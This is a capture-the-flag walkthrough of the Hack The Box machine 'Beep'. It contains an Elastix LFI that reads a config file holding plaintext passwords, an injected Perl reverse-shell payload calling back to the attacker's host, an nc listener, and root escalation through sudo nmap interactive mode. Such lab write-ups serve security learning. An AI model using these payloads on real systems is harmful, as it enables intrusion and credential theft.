Beep
Contents
Ports scanning
root@kali:~/HTB/Machines/Beep# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.7 --rate=1000 Starting masscan 1.0.5 at 2019-11-15 15:03:24 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 110/tcp on 10.10.10.7 Discovered open port 10000/tcp on 10.10.10.7 Discovered open port 22/tcp on 10.10.10.7 Discovered open port 25/tcp on 10.10.10.7 Discovered open port 4445/tcp on 10.10.10.7 Discovered open port 3306/tcp on 10.10.10.7 Discovered open port 995/tcp on 10.10.10.7 Discovered open port 4190/tcp on 10.10.10.7 Discovered open port 4559/tcp on 10.10.10.7 Discovered open port 878/tcp on 10.10.10.7 Discovered open port 80/tcp on 10.10.10.7 Discovered open port 111/tcp on 10.10.10.7 Discovered open port 993/tcp on 10.10.10.7 Discovered open port 443/tcp on 10.10.10.7 Discovered open port 5038/tcp on 10.10.10.7 Discovered open port 143/tcp on 10.10.10.7 Discovered open port 10000/udp on 10.10.10.7 rate: 0.00-kpps, 100.00% done, waiting -290-secs, found=16
Nmap output of these ports
# Nmap 7.80 scan initiated Fri Nov 15 10:14:31 2019 as: nmap -sC -sV -p22,25,80,110,111,143,443,878,993,995,3306,4190,4449,5038,10000,U:10000 -o nmap.txt 10.10.10.7 Nmap scan report for beep.htb (10.10.10.7) Host is up (0.045s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://beep.htb/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: PIPELINING TOP UIDL RESP-CODES AUTH-RESP-CODE LOGIN-DELAY(0) STLS EXPIRE(NEVER) APOP IMPLEMENTATION(Cyrus POP3 server v2) USER 111/tcp open rpcbind 2 (RPC #100000) 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: IMAP4rev1 Completed RIGHTS=kxte STARTTLS UIDPLUS ANNOTATEMORE MULTIAPPEND X-NETSCAPE MAILBOX-REFERRALS CONDSTORE LIST-SUBSCRIBED LISTEXT ATOMIC NAMESPACE IMAP4 CHILDREN RENAME ID BINARY NO THREAD=ORDEREDSUBJECT IDLE CATENATE URLAUTHA0001 ACL THREAD=REFERENCES QUOTA SORT SORT=MODSEQ LITERAL+ UNSELECT OK 443/tcp open ssl/https? |_ssl-date: 2019-11-15T16:15:20+00:00; +59m59s from scanner time. 878/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4449/tcp closed privatewire 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Host script results: |_clock-skew: 59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Nov 15 10:17:57 2019 -- 1 IP address (1 host up) scanned in 205.91 seconds
Elastix
Elastix: Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing. (https://en.wikipedia.org/wiki/Elastix)
Vulnerabilities
root@kali:~/HTB/Machines/Beep# searchsploit elastix
------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------ ----------------------------------------
Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result
Elastix LFI vulnerability
root@kali:~/HTB/Machines/Beep# searchsploit -p 37637
Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
URL: https://www.exploit-db.com/exploits/37637
Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators
root@kali:~/HTB/Machines/Beep# cp /usr/share/exploitdb/exploits/php/webapps/37637.pl ./
We find the LFI URL #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
root@kali:~/HTB/Machines/Beep# mkdir elasticlfi root@kali:~/HTB/Machines/Beep# cd elasticlfi/ root@kali:~/HTB/Machines/Beep/elasticlfi# wget --no-check-certificate "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action" -O amportal.conf Connecting to 10.10.10.7:443... connected. WARNING: The certificate of ‘10.10.10.7’ is not trusted. WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer. WARNING: The certificate of ‘10.10.10.7’ has expired. The certificate has expired The certificate's owner does not match hostname ‘10.10.10.7’ HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘amportal.conf’ amportal.conf [ <=> ] 13.46K --.-KB/s in 0.008s 2019-11-15 11:33:19 (1.65 MB/s) - ‘amportal.conf’ saved [13779]
We can repeat the action with more file for example /etc/passwd
root@kali:~/HTB/Machines/Beep/elasticlfi# wget --no-check-certificate "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action" -O passwd
The configuration file has some passwords:
root@kali:~/HTB/Machines/Beep/elasticlfi# cat amportal.conf | grep -v "#" | grep -v "^$" AMPDBHOST=localhost AMPDBENGINE=mysql AMPDBUSER=asteriskuser AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin AMPMGRPASS=jEhdIekWmdjE AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin AMPWEBROOT=/var/www/html AMPCGIBIN=/var/www/cgi-bin FOPWEBROOT=/var/www/html/panel FOPPASSWORD=jEhdIekWmdjE ARI_ADMIN_USERNAME=admin ARI_ADMIN_PASSWORD=jEhdIekWmdjE AUTHTYPE=database AMPADMINLOGO=logo.png AMPEXTENSIONS=extensions ENABLECW=no ZAP2DAHDICOMPAT=true MOHDIR=mohmp3 AMPMODULEXML=http://mirror.freepbx.org/ AMPMODULESVN=http://mirror.freepbx.org/modules/ AMPDBNAME=asterisk ASTETCDIR=/etc/asterisk ASTMODDIR=/usr/lib/asterisk/modules ASTVARLIBDIR=/var/lib/asterisk ASTAGIDIR=/var/lib/asterisk/agi-bin ASTSPOOLDIR=/var/spool/asterisk ASTRUNDIR=/var/run/asterisk ASTLOGDIR=/var/log/asteriskSorry! Attempt to access restricted file.
From the passwd file, we find the a username fanis
root@kali:~/HTB/Machines/Beep/elasticlfi# cat passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash Sorry! Attempt to access restricted file.
Elastic portal access
It provides a lot of information.
Elastix Remote Code Execution
root@kali:~/HTB/Machines/Beep# searchsploit -p 18650
Exploit: FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/18650
Path: /usr/share/exploitdb/exploits/php/webapps/18650.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
root@kali:~/HTB/Machines/Beep# cp /usr/share/exploitdb/exploits/php/webapps/18650.py ./
This vulnerability is simple, but I need a working extension to use it.
root@kali:~/HTB/Machines/Beep# cat 18650.py | grep -v "^#" | grep -v "^^M" import urllib rhost="10.10.10.7" lhost="10.10.14.34" lport=443 extension="1000" url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib.urlopen(url)
Find extension
There are several ways to find the extension.
Elastic portal
VoIP enumeration
root@kali:~/HTB/Machines/Beep# svwar -e100-9999 10.10.10.7
ERROR:TakeASip:SIP server replied with an authentication request for an unknown extension. Set --force to force a scan.
WARNING:root:found nothing
root@kali:~/HTB/Machines/Beep# svwar -m INVITE -e100-9999 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '704' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 704 | weird |
| 233 | reqauth |
Open listener
root@kali:~/HTB/Machines/Beep# lrwrap nc -lvp 443 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443
Run exploit
Modify script with correct extension.
root@kali:~/HTB/Machines/Beep# cat 18650.py | grep -v "^#" | grep -v "^^M" import urllib rhost="10.10.10.7" lhost="10.10.14.34" lport=443 extension="233" url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20- e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib.urlopen(url)
Run it.
root@kali:~/HTB/Machines/Beep# python 18650.py Traceback (most recent call last): File "18650.py", line 27, in <module> urllib.urlopen(url) File "/usr/lib/python2.7/urllib.py", line 87, in urlopen return opener.open(url) File "/usr/lib/python2.7/urllib.py", line 215, in open return getattr(self, name)(url) File "/usr/lib/python2.7/urllib.py", line 445, in open_https h.endheaders(data) File "/usr/lib/python2.7/httplib.py", line 1065, in endheaders self._send_output(message_body) File "/usr/lib/python2.7/httplib.py", line 892, in _send_output self.send(msg) File "/usr/lib/python2.7/httplib.py", line 854, in send self.connect() File "/usr/lib/python2.7/httplib.py", line 1290, in connect server_hostname=server_hostname) File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket _context=self) File "/usr/lib/python2.7/ssl.py", line 599, in __init__ self.do_handshake() File "/usr/lib/python2.7/ssl.py", line 828, in do_handshake self._sslobj.do_handshake() IOError: [Errno socket error] [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:727)
There is an unexpected error (invalid certificate?), we print the Payload URL instead of opening it.
root@kali:~/HTB/Machines/Beep# cat 18650.py | grep -v "^#" | grep -v "^^M" import urllib rhost="10.10.10.7" lhost="10.10.14.34" lport=443 extension="233" url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20- e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' print(url)
Run again:
root@kali:~/HTB/Machines/Beep# python 18650.py https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.34%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A root@kali:~/HTB/Machines/Beep# wget --no-check-certificate -O /dev/null `python 18650.py` --2019-11-15 14:12:39-- https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.34%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A Connecting to 10.10.10.7:443... connected. WARNING: The certificate of ‘10.10.10.7’ is not trusted. WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer. WARNING: The certificate of ‘10.10.10.7’ has expired. The certificate has expired The certificate's owner does not match hostname ‘10.10.10.7’ HTTP request sent, awaiting response... 200 OK Length: 1195 (1.2K) [text/html] Saving to: ‘/dev/null’ /dev/null 100%[=======================================>] 1.17K --.-KB/s in 0s 2019-11-15 14:12:39 (14.2 MB/s) - ‘/dev/null’ saved [1195/1195]
And a reverse shell opens in the listener:
root@kali:~/HTB/Machines/Beep# lrwrap nc -lvp 443 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.10.10.7. Ncat: Connection from 10.10.10.7:59911. whoami asterisk
Privilege escalation
From the reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ CTRL Z
[1]+ Stopped rlwrap nc -lvp 443
root@kali:~/HTB/Machines/Beep# stty rows 24 columns 134
root@kali:~/HTB/Machines/Beep# stty raw -echo
root@kali:~/HTB/Machines/Beep# fg rlwrap nc -lvp 443
bash-3.2$ export TERM=screen
export TERM=screen
In the same exploit, they explain how to escalate to root with nmap allowed to sudo with asterix user.
bash-3.2$ sudo -l sudo -l Matching Defaults entries for asterisk on this host: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper bash-3.2$ sudo nmap --interactive sudo nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh sh-3.2# id id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
User flag
sh-3.2# cat /home/fanis/user.txt cat /home/fanis/user.txt <USER FLAG>
Root flag
sh-3.2# cat /root/root.txt cat /root/root.txt <ROOT FLAG>
References
Daniel Simao 09:21, 15 November 2019 (EST)
